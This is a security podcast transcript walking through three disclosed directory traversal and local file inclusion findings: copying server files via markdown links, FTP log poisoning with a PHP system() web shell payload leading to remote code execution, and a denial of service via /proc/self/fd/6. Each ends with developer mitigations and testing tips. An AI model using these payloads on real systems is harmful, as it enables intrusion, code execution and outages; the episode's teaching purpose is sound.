Hacked & Secured: Pentest Exploits & Mitigations

Ep. 9 – Directory Traversal & LFI: From File Leaks to Full Server Crash

Amin Malekpour Season 1 Episode 9

One markdown link copied server files. One poisoned log triggered remote code execution. One LFI crashed the entire server.
In this episode, we unpack three real-world exploits—directory traversal and local file inclusion flaws that went far beyond file reads. From silent data leaks to full server compromise, these attacks all started with a single trusted path.

Chapters:

00:00 - INTRO

01:07 - FINDING #1 - Server File Theft with Directory Traversal

09:23 - FINDING #2 - From File Inclusion to RCE via Log Poisoning

16:20 - FINDING #3 - LFI to Server Crash

24:09 - OUTRO

Want your pentest discovery featured? Submit your creative findings through the Google Form in the episode description, and we might showcase your finding in an upcoming episode!

🌍 Follow & Connect → LinkedIn, YouTube, Twitter, Instagram
📩 Submit Your Pentest Findings → https://forms.gle/7pPwjdaWnGYpQcA6A
📧 Feedback? Email Us podcast@quailu.com.au
🔗 Podcast Website → Website Link

INTRO 

What if just moving a ticket between projects gave you access to files buried deep in the server, like config files or private keys?

What if a single log entry—written automatically by the system—could be weaponised to execute remote commands?

And what if all it took to crash a production server… was loading the wrong file?

I’m Amin Malekpour, and you are listening to Hacked & Secured: Pentest Exploits & Mitigations

In today’s episode, we’re unpacking three path traversal and LFI vulnerabilities that prove just how dangerous file access bugs can be.

Sometimes, you don’t need a shell to cause real damage. You just need to know which file to target and how to trick the application into loading it

FINDING #1 - Server File Theft with Directory Traversal

You move a ticket from one project to another. Just a normal admin task, right? A simple way to stay organised, clean up your board, and keep things tidy.

But what if that move did something more?

What if, behind the scenes, it quietly copied a file you were never meant to see—like a server config file, or even a private SSH key?

And all of it happened because of how the system handled markdown links inside the issue.

That’s exactly what Vakzz discovered and reported on HackerOne—a directory traversal vulnerability that let attackers copy any file they wanted from the backend server, just by sneaking in a tricky file path inside a markdown link.

Before we jump into the first finding, let’s take a moment to talk about the type of vulnerabilities we’re dealing with in this episode. All three findings share the same root issue—they’re either path traversal or local file inclusion. So if those terms sound unfamiliar for you, here’s a quick explanation.

Let’s start with path traversal, also known as directory traversal. This happens when an app lets you give it a file path, like “Tell me which document to open”, but it doesn’t properly check where that path actually leads. So an attacker changes the input to something like “dot dot slash, dot dot slash, etc slash passwd,” and suddenly they’re reading sensitive files buried deep in the server.

Here’s a simple way to think about it:

You work in an office. Every department has its own locked cabinet. If you ask the assistant for your payslip, they grab it from the HR drawer. But what if you sneakily change the folder name and say, “Actually, get me something from HR/confidential.” And the assistant, without checking, just hands it over. That’s path traversal. The system trusts what you asked for and never checks where it really goes.

Now, LFI—or Local File Inclusion—takes it a step further. It’s like path traversal, but instead of just reading the file, the app actually loads it into the page or runs it as part of the code. So if you point it to something like a system file or config file, it might show that content or worse, process it in the backend.

Imagine giving the app a file path like “dot dot slash dot dot slash etc slash passwd.”
 And instead of blocking it, the app says, “No problem,” and includes that file right into the page it’s building.

At that point, you’re not just viewing a file.
 You’re making the app pull that file into itself—as if it were part of the app’s own content.
 And sometimes? That’s all it takes for things to go very wrong.

With path traversal, you’re just looking into places you shouldn’t look.
 But with LFI? You’re actually dragging those files into the app itself, and making the app handle them like they belong there.

The Discovery: A Markdown Pattern That Was Too Trusting

Alright, let’s get back to the story.

Vakzz was looking into how the platform handled file uploads inside issue descriptions—especially the markdown links that get added when you attach a file.

Normally, these links just point to safe stuff—like images, PDFs, or screenshots stored by the app.

But something caught his eye.
 Each markdown link had a pattern: it included a secret-looking string and the actual file name.
 And that file name? It wasn’t being cleaned or checked properly.

So he had an idea—what if he changed the file name to a path that goes outside the uploads folder?
 Something like “dot dot slash dot dot slash etc slash passwd”?

Now, instead of linking to a normal file, the markdown points to a real file on the server’s system.

But here’s the clever part.
 The real magic happened when Vakzz moved the issue to another project. Why? Because when you move an issue, the platform tries to bring all related files with it, including anything mentioned in the markdown.

So the server saw the link, followed the path, and quietly pulled that sensitive file into the new project—thinking it was just part of the original issue.

That’s when a small markdown trick turned into full file access.

Here’s how it happened.

Vakzz created two projects. In the first one, he opened a new issue and added a markdown link. It looked totally normal—just a link to a file.

But the link was special. It didn’t point to a normal file like an image or a PDF. Instead, it used a sneaky path like “dot dot slash dot dot slash etc slash passwd” to reach outside the uploads folder—into the server’s own system files.

He saved the issue. No error. Everything looked fine.

Then he moved that issue into the second project.

And this is where the backend kicked in. When you move an issue, the system also moves any files linked to it. But it didn’t check the file path. So instead of just moving a user upload, it followed the dangerous path and grabbed a file from deep inside the server.

The server then copied that system file into the new project’s uploads folder—treating it like a regular upload.

Now Vakzz had access to a sensitive file, pulled directly from the server, and it was sitting in his project like it belonged there.

This wasn’t just reading a file.
 This was getting the server to fetch it for him—through a trusted process.
 It wasn’t just a simple bug. It gave real access to files that were never meant to be shared.

You might wonder—could this kind of attack still work today?
 The answer is yes. These kinds of vulnerabilities still exist.

Why?
 Because modern systems are made up of many moving parts.
 There’s markdown rendering, file handling, project migrations—all working together behind the scenes.
 And sometimes, one small piece assumes another part has already done the safety checks.

If just one step misses a validation—especially for something like a file path—that’s enough to open the door.
 And that’s where issues like this still manage to sneak in.

Here’s what went wrong:

  • The markdown system allowed raw file paths to be inserted.
  • Then, during issue migration, the platform tried to follow those paths—without checking where they actually pointed.
  • And there was no validation before copying the file into the new project.

So to everyone building or designing applications, here’s how you can prevent issues like this from slipping in:

  • Never trust file paths from user input. Always validate and sanitise them—every time.
  • Set strict directory rules. Only allow access to specific, safe folders.
  • Double-check background operations. When moving issues or generating reports, make sure every file being touched is actually safe.

Bugs like this don’t usually show up during a login test or a regular form scan.
 They hide inside the quiet, automated features—where nobody’s looking.

Alright fellow pentesters, here’s how you can spot similar issues during your daily engagements:

  • If the app lets you reference files using IDs or paths—even in things like markdown, comments, or metadata—try injecting traversal sequences like dot dot slash. You’d be surprised how often these inputs aren’t properly sanitised, especially in places users don’t normally touch.
  • Look for background processes like issue migrations, file converters, or backups—anything that might automatically follow those file references.
  • And always ask yourself: “If I gave this system a malicious file path… would it actually go fetch it?”

Here’s the thing—directory traversal isn’t loud. It hides in plain sight, quietly blending into everyday workflows.
 If your platform copies files without checking where they came from, that’s not just a bug—it’s a blind spot. That’s exactly where the smartest attacks begin.

FINDING #2 - From File Inclusion to RCE via Log Poisoning

We started with a file path hidden inside markdown—one that let you copy sensitive files into your own project, just by moving an issue.

But what if I told you… the next attack didn’t need file uploads, and it didn’t rely on project transfers either?

What if all it needed… was a log file.
 One the server was already writing—automatically, in the background.

And with that?
 You go from simply reading files… to running commands.

This is exactly what Jerry Shah documented in a security write-up on Medium.com—a Local File Inclusion vulnerability, chained with log poisoning, that led to full Remote Code Execution.

Let’s break it down.

Jerry started with a classic Local File Inclusion bug.
 He found a parameter in the app that let him request local file paths—basically telling the server, “Hey, show me what’s inside this file.”

So he tested it with something common, like /etc/passwd—a file that lists all user accounts on the system.
 That one worked. He could read it.

Then he tried /etc/shadow, which stores the actual password hashes.
 But this time? Nothing came back. Either the file was blocked, or the server didn’t allow access in that context.

Most people would’ve stopped there. But Jerry didn’t.

Instead, he took a step back and asked himself:
 “What else could I try reading?”

He started thinking about log files—files that record different kinds of server activity.
 First, he tried accessing auth.log, which keeps a record of login attempts for services like SSH.
 Still nothing. No output.

But Jerry didn’t give up. He started looking for other clues.
 He ran an nmap scan on the target server to check for open ports—and that’s when he noticed something interesting: FTP was running.

Let’s put you in Jerry’s shoes for a second.
 You’ve got an LFI bug—but the usual files like /etc/shadow, and even auth.log? They’re all blocked or empty.

You’re not getting anywhere.

But then you spot something: FTP is running on the server.

So let me ask you—what would you do next?
 Would you try anonymous login? Look for writable folders?
 Or—like Jerry—would you start thinking one step ahead?

He didn’t try to brute-force anything. Here’s what he did.

He knew that FTP has its own logging system. And by default, it writes to a file called vsftpd.log, usually stored in var/log folder. That gave him a new direction.

Because if the server was running FTP—and if logging was turned on—then maybe he could write his own payload into that log… and later include it using LFI.

And that’s exactly where things started to escalate.

He used the LFI parameter to request var/log/vsftpd.log—and this time, it worked.
The server responded with the contents of the FTP log file.
That was the confirmation he needed.

Now, the next step was to poison that log file to sneak in some PHP code that would run when the file was included by the server.

So he did something clever.

He made a fake FTP login attempt, but instead of using a normal username, he used a PHP payload.
 The payload looked like this: <?php system($_GET["commandinjection "]); ?>

php, system, dollar underscore GET with a commandinjection as a parameter in it.

That’s just PHP code that tells the server,
 “Run whatever command I send through the commandinjection parameter.”

He didn’t upload this code directly.
 He simply logged in to FTP using that code as his username.
 And because vsftpd logs everything—including usernames—that payload got saved right into the log file.

Then he went back to the LFI endpoint to check the vsftpd.log file but this time, he added a parameter at the end and requested:
 /var/log/vsftpd.log&commandinjection=ifconfig

And just like that, the server responded with the output of the ifconfig command in the log file.

He found a Remote code execution. Triggered from a log file. Using nothing more than a fake FTP login.

Put those two things together—file inclusion and log poisoning—and you’ve got full control.

At this point, the server isn’t just showing you files anymore…
 it’s running your code.
 And all it took was reading the right log file at the right time.

Here’s what went wrong:

  • The application had a Local File Inclusion vulnerability lets users read files from the server just by changing a parameter—no validation, no filters.
  • Through that LFI, attackers could access ftp log file.
  • And worst of all? The server executed whatever was inside those files when they were included—without checking if the content was safe.

So to everyone building or designing applications, here’s how you can prevent something like this:

  • Never include files based on user input. If you absolutely must, limit it to a strict allowlist of safe file paths.
  • Treat log files as sensitive. They may not be public, but if your app can include them—even indirectly—they become an attack surface.
  • Sanitize everything that goes into logs. Usernames, headers, anything the user controls. Never let raw input get logged in a way that could later be processed as code.
  • And anytime you’re dealing with dynamic file inclusion, ask yourself:
     “What happens if an attacker controls the content of that file?”

Because here’s the truth:
 Letting someone read a file is bad…
 But letting them write into that file—and then get the server to run it?
 That’s a whole different  story.

Alright, fellow pentesters—here are the key takeaways from this finding:

  • If you find an LFI, don’t stop at /etc/passwd. That’s just the surface. Think about what other files might be available—especially ones that update in real time.
  • Check for exposed logs. FTP logs, SSH logs, access logs—anything the system writes automatically. If you can read it, you might be able to poison it.
  • And always test chaining. On its own, LFI might seem low impact. But when you chain it with something like log poisoning? Suddenly, it’s Remote Code Execution.

When the app lets you decide which file to load—and what content goes into it...
that’s not just a bug.

That’s the system inviting you in and letting you run the show.

FINDING #3 - LFI to Server Crash

We started this episode with a file path hidden in markdown—one that let you move an issue and quietly pull sensitive files from the backend server.
 Then, we saw how a LFI technique—when paired with log poisoning—could escalate into full remote code execution.

But what if you couldn’t move issues… and you couldn’t run code either?

What if all you had was an LFI bug—and no access to secrets, no way to write to the system, and no way to get code execution?

Would you give up? Or would you pivot, shift your mindset… and use that same LFI to compromise the availability of the server?

This next finding contributed to our podcast by one of our listeners. They asked to stay anonymous — and the technique they shared? It’s worth talking about.

This is a classic case of Local File Inclusion, but used in a way that compromised confidentiality and availability—even when integrity stayed untouched.

Let’s walk through it.

This one started during a black-box test. No access, no credentials—just a login page.

The login endpoint itself was solid. No brute-force, no injection. So the tester did what most good testers do—went back to Burp history to see what else the app was doing behind the scenes.

That’s when they spotted a request to an endpoint called “underscore assets.”

This endpoint was being used to load image files and JavaScript. But it accepted a file path—one that looked like it might be modifiable.

So they appended a path traversal sequence—dot dot slash repeated several times—and then added “etc/passwd.”

And when they hit the request?

The server returned the contents of the passwd file. Plaintext. No error. No restriction.

At this point, the LFI was fully confirmed.

 The tester could read any file that the server process had access to.
 So, like any good pentester, they started digging—looking for secrets.

They checked the usual stuff.
 /etc/passwd? Accessible.
 /etc/shadow? Blocked.
 Then came the search for SSH keys, API tokens, config files.
 But no luck.
 No active credentials. No database passwords.
 They even tried reading logs—nothing was exposed, no log files accessible. At most, they found a few expired tokens—leftovers from old sessions.
 But nothing they could use.

They ran an Nmap scan—just to see what doors were open. But the result? Only two ports: HTTP and SSH.
 No FTP, no database ports, nothing juicy.
 Just the basics.
 It looked   like a dead end.
 No easy way in, and nothing obvious to abuse.

 So far… they had read access, but no way to modify anything.

At this point, many testers might’ve said:
 “Well, that’s it. Low-impact LFI. Nothing critical.”

But not this tester.

They paused—and started thinking like a real attacker.
 They asked themselve:
 “Okay… I can’t write. I can’t steal secrets. But can I break something?”

And that’s where mindset matters.
 Because they remembered: this wasn’t just a test app.
 This was a vendor platform—used by multiple clients across different regions.
 If you could knock it offline… even for a few minutes…
 That’s a critical finding.

So now, the focus shifted to availability.

What if there was a file on the system—some internal Linux file—that eats a lot of memory when it’s read?
 And what if the app wasn’t prepared to handle that?

They started researching:
 “Big files on Linux that can cause memory pressure when read via web apps…”

And that’s when they found something interesting: /proc folder and /proc/self/fd/6 file.
 It’s not a normal file. It’s a file descriptor that behaves differently depending on how the server handles it.
 And in certain setups, reading that file pulls in a massive stream of data, which can crash the process due to memory exhaustion.

So they tried it.
 And just to be clear—this was all done in a test environment, not production.
 No real users were impacted. No customer data was ever at risk if the server went down.

They crafted the LFI payload to point to one specific file:
 /proc/self/fd/6

Sent the request…

And boom.

The app went down.
 No error message. No graceful failure.
 The server ran out of memory and crashed.
 A denial of service triggered by reading a single file.

Now think about that.
 No code execution. No password dumps.
 Just reading a large file in the wrong place—and it’s game over for the server.

This is what attacker mindset looks like.
 You don’t stop when you can’t escalate.
 You ask: “What else can I impact?”
Because even if integrity is safe, and confidentiality is limited…
availability is still on the table.

And in a multi-tenant vendor system, availability is everything.

So in the end?
One overlooked image loader…
One unchecked file path…
And the tester managed to take the app down completely.

Here’s where things broke down:

• The image loader was taking file paths from the user… without cleaning them up first.

• There were no checks to stop someone from escaping the safe folder using path traversal.

• And worst of all—there were no limits. No timeout, no file size check, nothing. The server just kept reading until it ran out of memory.

So to everyone building or designing applications—Here’s how you can prevent something like this from happening:

• Sanitize and normalize every file path. Don’t trust raw input—make sure users can’t jump out of safe directories.
 • Restrict access to only the folders your app is meant to serve from—especially if you’re serving static files or images.

• And set clear limits. Add timeouts, file size caps, memory ceilings—because sometimes, even a simple file read can bring your server to its knees.

Fellow pentesters, here’s how you can find issues like this in your own tests:

• If you see a file path—always test it with dot dot slash. Start simple: try known files like /etc/passwd and see how the app responds.
• If you don’t find secrets? Shift your goal. Maybe it’s not about access— it’s about breaking the system’s balance. Can you slow it down? Crash it?
• And don’t forget about unprotected asset endpoints. Things like image loaders or export tools—they often fly under the radar during security reviews.

You don’t need root access to make an impact.
If you can read something you shouldn’t—or take the whole app offline—that’s more than enough. But always remember—don’t run denial-of-service payloads in production.
Make sure you have clear permission from your manager or the client, and confirm that no real users or systems will be affected.

And one last thing…

So if you’re out there and you’ve found something interesting—even if it’s not a full-blown RCE or some crazy exploit chain—send it in.
 You don’t need to write a full blog post or tell the perfect story.
 Just drop the details. Tell us what happened. What you tried, what worked, what broke while keeping the client details private.

We’ll take care of the rest and help share it with the community. Because someone out there is building a system right now—and your story might be the reason they catch a bug before it becomes a breach.

That’s why we do this. To learn from each other, and to raise the bar—one real-world exploit at a time. You can find the google form link for submissions in the description.

OUTRO

Every vulnerability we covered today had one thing in common—they all came down to trusting file paths.
Whether it was a markdown link, a log file, or a static asset—trusting the path gave attackers a way in. And every one of these bugs was responsibly disclosed. That’s what makes a real impact.

If this episode helped you learn something new, share it with someone who needs to hear it. Maybe it’s a developer, a pentester, or someone working in a security team. Because someone out there is building or designing something right now—and this might be the episode that helps them catch the bug before it matters. Let’s make cybersecurity knowledge accessible to all. See you in the next episode.

 



People on this episode